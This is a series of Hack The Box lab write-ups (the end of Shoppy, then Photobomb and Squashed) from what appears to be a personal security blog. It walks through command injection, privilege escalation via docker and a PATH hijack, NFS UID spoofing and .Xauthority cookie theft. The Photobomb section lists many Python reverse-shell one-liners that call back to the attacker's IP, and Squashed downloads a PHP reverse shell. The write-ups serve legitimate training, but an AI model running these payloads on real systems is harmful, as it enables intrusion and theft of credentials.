mattermost              [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 18ms]
:: Progress: [100000/100000] :: Job [1/1] :: 3117 req/sec :: Duration: [0:00:42] :: Errors: 0 ::

In order to visit this subdomain, I echoed it into my host file. This gave me a login page which I was able to login to with the username Josh and the password we just cracked. Once the page loaded, it was evident that it was a chat application similar to Slack. Furthermore, I searched through the different channels and found a set of credentials. This a daily reminder not to share credentials in plaintext… ever.

Shoppy Foothold

Our initial scans showed that SSH was open. Attempting to SSH to the machine with the newly discovered credentials does give us access. Furthermore, it looks like we have the ability to run a password-manager command as the user deploys with sudo.

┌─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $ssh [email protected]
The authenticity of host '10.129.227.233 (10.129.227.233)' can't be established.
ECDSA key fingerprint is SHA256:KoI81LeAk+ps7zoc1ru39Mg7srdxjzOb1UgmdW6T6kI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.227.233' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
manpath: can't set the locale; make sure $LC_* and $LANG are correct
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

I was also able to grab the user flag.

jaeger@shoppy:~$ cat /home/jaeger/user.txt 
2b5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓320

I executed the password manager binary and it asked me for a password. Next, I tried the same password that I used to SSH to the machine but it was incorrect.

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sh0ppyBest@pp!
Access denied! This incident will be reported !

After that, I used strings on the binary to see whether I could find the password that way. Initially, strings reported back a lot of information. Not all of it was useful but I could see that it was using cat to read the contents of a creds.txt file. I ran strings again with different encoding and got the word “Sample” back.

jaeger@shoppy:~$ strings -e l /home/deploy/password-manager
Sample

Running the password-manager binary again with the correct password gave me some credentials.

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

I was then able to switch user or SSH to the machine as the deploy user. Unfortunately, the deploy user didn’t have any sudo privileges. However, upon checking the groups that the user belonged to, it became evident that Docker was going to play a part in the privilege escalation process.

$ sudo -l
[sudo] password for deploy: 
Sorry, user deploy may not run sudo on shoppy.
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
alpine       latest    d7d3d98c851f   7 months ago   5.53MB

Shoppy Docker Privilege Escalation

Using Docker, I span up a new container where the root of the machine was mounted inside the container. Doing so should give me the permissions needed to access the root flag. Once the container was created I used chroot and was able to grab the root flag.

$ docker run --rm -it -v /:/mnt alpine /bin/sh
/ # cd /mnt
/mnt # chroot .
root@149fdb7a4b87:/# 
root@149fdb7a4b87:/# cat /root/root.txt
3d5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓269

This was a fun machine. I haven’t done much with the technologies involved like Node.JS and NoSQL databases. I have done privilege escalation with docker containers before but that was a while ago that required me to upload the image myself (from what I remember). Anyway, I learnt a lot from this box which I’m sure I will forget in a week’s time.

Hack The Box – Photobomb

Posted on January 14, 2025 by haxez

Hello world and welcome to haxez, this is a write-up for the Hack The Box Photobomb machine. This machine is listed as an easy machine. It requires some web application enumeration to gain access to the admin area. Then, you need to perform remote code execution on a parameter in order to get a shell. Finally, you need to elevate your privileges to root by exploiting a script that calls a binary without an absolute path.

Enumerating Photobomb

First, we perform a Nmap scan targeting the IP of the Photobomb box. I used ‘sT’ for full TCP connect scan, ‘sV’ to get service versions, ‘-p-‘ to scan all ports, ‘–script vulns’ to check for vulnerabilities and ‘–reason’ just to see why Nmap has concluded what it concluded. The results show that port 22 for SSH and port 80 for HTTP are open.

Nmap scan report for 10.129.248.187
Host is up, received echo-reply ttl 63 (0.015s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/10%OT=22%CT=1%CU=37113%PV=Y%DS=2%DC=T%G=Y%TM=640AFE0
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M550ST11NW7%O2=M550ST11NW7%O3=M550NNT11NW7%O4=M550ST11NW7%O5=M550ST1
OS:1NW7%O6=M550ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M550NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   13.40 ms 10.10.14.1
2   13.66 ms 10.129.248.187
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.46 seconds

Wandering The Web

Since it is unlikely we need to brute force our way in, we will start with the web application on port 80. Navigating to the IP of the application will give you an error because you don’t have the hostname in your /etc/hosts file. However, this can be resolved easily by running the following command to echo it into your host’s file. Just ensure you replace the IP.

┌─[joe@parrot]─[/mnt/hgfs/MOUNT/Photobomb]
└──╼ $sudo echo "10.129.248.187 photobomb.htb" | sudo tee -a /etc/hosts

Next, I ran gobuster against the domain but didn’t find much. You can see the output of that below but there isn’t really much to show.

┌─[✗]─[joe@parrot]─[/mnt/hgfs/MOUNT/Photobomb]
└──╼ $sudo gobuster dir -u http://photobomb.htb/ -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://photobomb.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/10 10:02:27 Starting gobuster in directory enumeration mode
===============================================================
/favicon.ico          (Status: 200) [Size: 10990]
/printers             (Status: 401) [Size: 188]  
/printer              (Status: 401) [Size: 188]                
===============================================================
2023/03/10 10:02:37 Finished

The landing page of the website had a link which redirected you to an admin page. However, the admin page was protected by HTTP basic authentication. We could brute force this but it’s probably better to look around a bit more first. Inspecting the index page, we see a link to a javascript file. Furthermore, navigating to this javascript file gives us some credentials.

It seems that Jameson got fed up with people forgetting the password. He coded the site to automatically authenticate users provided they have a matching cookie of ‘isPhotoBombTechSupport’.

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {  document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:[email protected]/printer');
  }
}
window.onload = init;

Go ahead, grab the URL including the username and password and paste it into your browser. It should automatically authenticate.

Photobomb Foothold

The website has a download link for the various photos. Clicking and intercepting this request with Burp Suite shows that it’s a post request with a number of parameters. We can send the request to the repeater and start playing with it.

So, I ran into a few issues here. When capturing the download request and attempting to play with that I kept getting 401 authorization errors. However, if you forward the first request, you then get another request with the basic auth HTTP header. This is the request where you can start having fun.

I set up a TCPDump on my tun0 interface. Sent the request to the repeater and then attempted to perform remote code execution ping on each parameter. The file type parameter failed to properly sanitise the code and started to ping my machine.

POST /printer HTTP/1.1 
Host: photobomb.htb 
Content-Length: 102 
Cache-Control: max-age=0 
Authorization: Basic cEgwdDA6YjBNYiE= 
Upgrade-Insecure-Requests: 1 
Origin: http://photobomb.htb 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Referer: http://photobomb.htb/printer 
Accept-Encoding: gzip, deflate 
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 
Connection: close 

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;+ping+-c+3+10.10.14.126&dimensions=3000x2000

And the TCPDump started lighting up like a Christmas tree. WE HAVE RCE.

┌─[joe@parrot]─[/mnt/hgfs/MOUNT/Photobomb]
└──╼ $sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:36:53.200183 IP 10.129.248.187 > 10.10.14.126: ICMP echo request, id 1, seq 1, length 64
10:36:53.200208 IP 10.10.14.126 > 10.129.248.187: ICMP echo reply, id 1, seq 1, length 64
10:36:54.202314 IP 10.129.248.187 > 10.10.14.126: ICMP echo request, id 1, seq 2, length 64
10:36:54.202344 IP 10.10.14.126 > 10.129.248.187: ICMP echo reply, id 1, seq 2, length 64

Catching Shells

Next, I headed to everyone’s favourite payload provider, payload all the things. I grabbed one of their python payloads. Configured it, set up my listener and… it didn’t work. I tried a few others. The ones below are all the ones that didn’t work. There were more, with modifications but yeah, trial and error I guess.

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
export RHOST="10.10.14.126";export RPORT=1337;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
export RHOST="10.10.14.126";export RPORT=8888;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT" ))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.10.14.126",8888));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'

None of those worked. In the end, I went to revshells.com Put in my IP address, and port and selected Python3#1. I asked it to URL encode it. I pasted it into the request and it worked instantly.

POST /printer HTTP/1.1 
Host: photobomb.htb 
Content-Length: 102 
Cache-Control: max-age=0 
Authorization: Basic cEgwdDA6YjBNYiE= 
Upgrade-Insecure-Requests: 1 
Origin: http://photobomb.htb 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Referer: http://photobomb.htb/printer 
Accept-Encoding: gzip, deflate 
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 
Connection: close 

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;export%20RHOST%3D%2210.10.14.126%22%3Bexport%20RPORT%3D8888%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27&dimensions=3000x2000

Side note. I just watched Ippsec’s video and he did this with a simple bash 1 liner. I feel stupid for not trying it.

Photobomb Authenticated Information Gathering

First things first, let’s make our shell a little bit more usable with the python stty trick.

which python3
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
wizard@photobomb:~/photobomb$

Then we can grab the user flag because we are a wizard.

wizard@photobomb:~/photobomb$ ls /home
ls /home
wizard
wizard@photobomb:~/photobomb$ ls /home/wizard
ls /home/wizard
photobomb  user.txt
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
cat /home/wizard/user.txt
08a▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓1eb

Ace, now time to poke about a bit and see what we can see. Soooo, we are now on the box. Time to gather some more information. The first thing I always tend to do is to run sudo –l to see if we have anything good.

wizard@photobomb:~/photobomb$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

It looks like we have a script called cleanup.sh in the opt directory that we can run as root without the password. Furthermore, environmental variables are reset with ‘env_reset’ and we can set our own environmental variables when running this script as indicated by the SETENV thingy. Let’s look at the script.

wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Looking back at this, I can see that the obvious exploit to go after is the find binary without the absolute path. Just drop your own find binary containing /bin/bash into /tmp and then execute the script with the PATH argument of /tmp. I didn’t do that though.

Photobomb Privilege Escalation

It is calling bashrc from /opt/.bashrc. From my understanding, bashrc is like a configuration file that bash runs. You have one in your home directory and you can add commands like screenfetch to it so that it displays asci art whenever you launch a terminal. Still, I wasn’t quite sure what to do here.

I took a look at the official walkthrough to find out what to do. The author of the walkthrough ran diff on the /opt/.bashrc and /etc/bash.bashrc files to see what was different. So I will do the same.

wizard@photobomb:~/photobomb$ diff /etc/bash.bashrc /opt/.bashrc
diff /etc/bash.bashrc /opt/.bashrc
5a6,11
> # Jameson: ensure that snaps don't interfere, 'cos they are dumb
> PATH=${PATH/:\/snap\/bin/}
> 
> # Jameson: caused problems with testing whether to rotate the log file
> enable -n [ # ]

I was a bit thrown off by this until I read the write-up. I understand the theory behind this privilege escalation and have done it with different binaries loads of times. The absolute path hasn’t been sent in a script. This means you can create your own binary with the same name and then change your environmental variable to point to that binary. Then, when you execute the script it uses your environmental variables to find the binary which you have pointed to the malicious binary.

The bit I didn’t understand was the square bracket. I didn’t know what I was looking at. It’s enabling something? It looked as though it was enabling comments. Ok… how does that help me. Well, it’s not enabling comments, it enabling the built-in shell command ‘[‘ without an absolute path. So in theory, if we create a malicious file named ‘[‘, place it somewhere like /tmp and then change our environment variable PATH to /tmp.

Then when we launch clenaup.sh, that launches bash which runs bashrc which runs our malicious ‘[‘ file. I think that’s how it is supposed to work anyway. Still learning.

Crafting The Exploit

So we need to create the ‘[‘ file in /tmp, add something to it and then make it executable.

wizard@photobomb:~/photobomb$ touch /tmp/[
touch /tmp/[
wizard@photobomb:~/photobomb$ echo '/bin/bash' > /tmp/[
echo '/bin/bash' > /tmp/[
wizard@photobomb:~/photobomb$ chmod +x /tmp/[
chmod +x /tmp/[

Then we run the /opt/cleanup.sh script while specifying the PATH environmental variable and it should give us root… question mark..

wizard@photobomb:~/photobomb$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# whoami
whoami
root
root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb#

Well that worked. We can now grab the root flag and we’re done.

root@photobomb:/home/wizard/photobomb# whoami
whoami
root
root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt
618▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓5e3
root@photobomb:/home/wizard/photobomb#

And we’re done. Fun box.

Hack The Box – Squashed

Posted on January 14, 2025January 14, 2025 by haxez

Hello world and welcome to haxez and my write-up for the Squashed machine. I’ve been getting back into doing Hack The Box machines again. I’ve started studying for the CPTS and the CBBH and thought I would do some boxes to complement the academy courses.

Information Gathering

Once I started the box I started enumerating it with Nmap. I targeted all ports, ran safe checks, and asked for version information. From the scan, results came back showing that ports 22, 80, 111, and 2049 were open. This suggested that the box was a web server with a publically exposed NFS service.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 09:55 GMT
Nmap scan report for 10.129.228.109
Host is up (0.022s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp    open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38714/udp6  mountd
|   100005  1,2,3      40865/tcp6  mountd
|   100005  1,2,3      48822/udp   mountd
|   100005  1,2,3      59769/tcp   mountd
|   100021  1,3,4      38567/tcp6  nlockmgr
|   100021  1,3,4      40531/tcp   nlockmgr
|   100021  1,3,4      46286/udp   nlockmgr
|   100021  1,3,4      53135/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
40531/tcp open  nlockmgr 1-4 (RPC #100021)
41359/tcp open  mountd   1-3 (RPC #100005)
43719/tcp open  mountd   1-3 (RPC #100005)
59769/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
Port 80 and nfs are open.

Network File System Enumeration

Rather than brute forcing SSH or checking out the website on port 80, I decided to check out the Network File System service. To do this, I used the showmount command and pointed it to the IP address of the machine. The results from Showmount suggested that there were 2 exports. One for a user called ross and one for the webserver.

┌─[joe@parrot]─[~]
└──╼ $sudo showmount -e 10.129.228.109
Export list for 10.129.228.109:
/home/ross    *
/var/www/html *

Squashed Foothold

In order to get a foothold on Squashed, I mounted the /var/www/html NFS export. Then, I listed the parent directory and got the user ID 2017.

┌─[joe@parrot]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/var/www/html /mnt/www
┌─[joe@parrot]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 09:35 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 2017 www-data 4096 Mar  9 09:35 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

I created my own user with that user ID and switched to it. I moved into the html directory and used wget to download a PHP reverse shell from the pentestmonkey GitHub page.

$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2023-03-09 09:39:25--  https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php                           100%[============================================>]   5.36K  --.-KB/s    in 0s      
2023-03-09 09:39:25 (57.3 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]

After changing the IP in the reverse shell, I set up a netcat listener and used curl to trigger the shell.

┌─[joe@parrot]─[~]
└──╼ $sudo curl http://10.129.228.109/php-reverse-shell.php

This allowed me to get a shell on Squashed as the user alex. I upgraded my shell using the python stty trick and was able to capture the user flag.

Squashed Privilege Escalation

In order to elevate privileges on Squashed, I mounted the ross NFS export. Next, I created a user with the same user ID as ross, switched to it, and started looking around.

┌─[joe@parrot]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/home/ross /mnt/ross

┌─[joe@parrot]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 10:11 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 htbs www-data 4096 Mar  9 10:10 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .
┌─[joe@parrot]─[~]
└──╼ $sudo useradd htbross
┌─[joe@parrot]─[~]
└──╼ $sudo usermod -u 1001 htbross
┌─[joe@parrot]─[~]
└──╼ $sudo su htbross
$ ls -laSh /mnt/ross
total 64K
drwxr-xr-x 14 htbross scanner 4.0K Mar  9 09:19 .
drwx------ 11 htbross scanner 4.0K Oct 21 15:57 .cache
drwx------ 12 htbross scanner 4.0K Oct 21 15:57 .config
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Desktop
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Documents
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Downloads
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .gnupg
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .local
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Music
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Pictures
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Public
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Templates
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Videos
-rw-------  1 htbross scanner 2.5K Mar  9 09:19 .xsession-errors
-rw-------  1 htbross scanner 2.5K Dec 27 15:33 .xsession-errors.old
-rw-------  1 htbross scanner   57 Mar  9 09:19 .Xauthority
drwxr-xr-x  1 root    root      22 Mar  9 09:35 ..
lrwxrwxrwx  1 root    root       9 Oct 20 14:24 .bash_history -> /dev/null
lrwxrwxrwx  1 root    root       9 Oct 21 14:07 .viminfo -> /dev/null

At this point, I had no idea what I was looking for. Normally, I would just drop an SSH key in the authorized_keys file and SSH to the box. However, that wasn’t the way this box was intended to be completed. I resorted to looking at the official walkthrough and now the Xauthority file is a dead giveaway. You can look up what the file is for and what the presence of it suggests but to keep this short, it stores session tokens for X sessions. We can steal the token and use it to snoop on ross.

Cat the contents of the file and base64 encode it so it isn’t jibberish. Then save the output into the /tmp directory of Squashed via your reverse shell as alex.

$ cat /mnt/ross/.Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1��Ȃ���).S��P���$

$ cat /mnt/ross/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC

$ echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC | base64 -d > /tmp/.Xauthority

Then, as alex we can do some more enumeration and find out what the configuration of ross’s session is. You can just press w apparently and it will show you. Had no idea. The more you know.

alex@squashed:/tmp$ w
w
10:26:43 up  1:07,  1 user,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               09:19    1:07m  9.11s  0.05s /usr/libexec/gnome-session-binary --systemd --session=gnome

Now, this allows us to start taking screenshots of the desktop with the following command… cool.

xwd -root -screen -silent -display :0 > /tmp/screen.xwd

Then, in order to access the screenshot we spin up a python web server and navigate to it and download it.

alex@squashed:/tmp$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET / HTTP/1.1" 200 -
10.10.14.126 - - [09/Mar/2023 10:33:30] code 404, message File not found
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.126 - - [09/Mar/2023 10:33:58] "GET /screen.xwd HTTP/1.1" 200 -

Open the image, mine defaulted to gimp. I love gimp so no complaints. It looks like it is a password manager showing the root password.

Squashed root Flag

With the password for root we can simply switch to the root user and capture the root flag from the root directory. That completes the box.

$ su root
Password: cahxxxxxxxi9A
whoami
root
cat /root/root.txt
692xxxxxxxxxxxxxxxxb159c

Conclusion

This was a fun box with an interesting privilege escalation technique. The method of completing it was fairly easy in terms of ability provided you understand the files you see. LinEnum didn’t flag the file as a method for privilege escalation so I wouldn’t have had a clue without the walkthrough. The great thing about Hack The Box machines is that everyone teaches you something new.

Hack The Box – Fawn

Posted on January 14, 2025January 14, 2025 by haxez

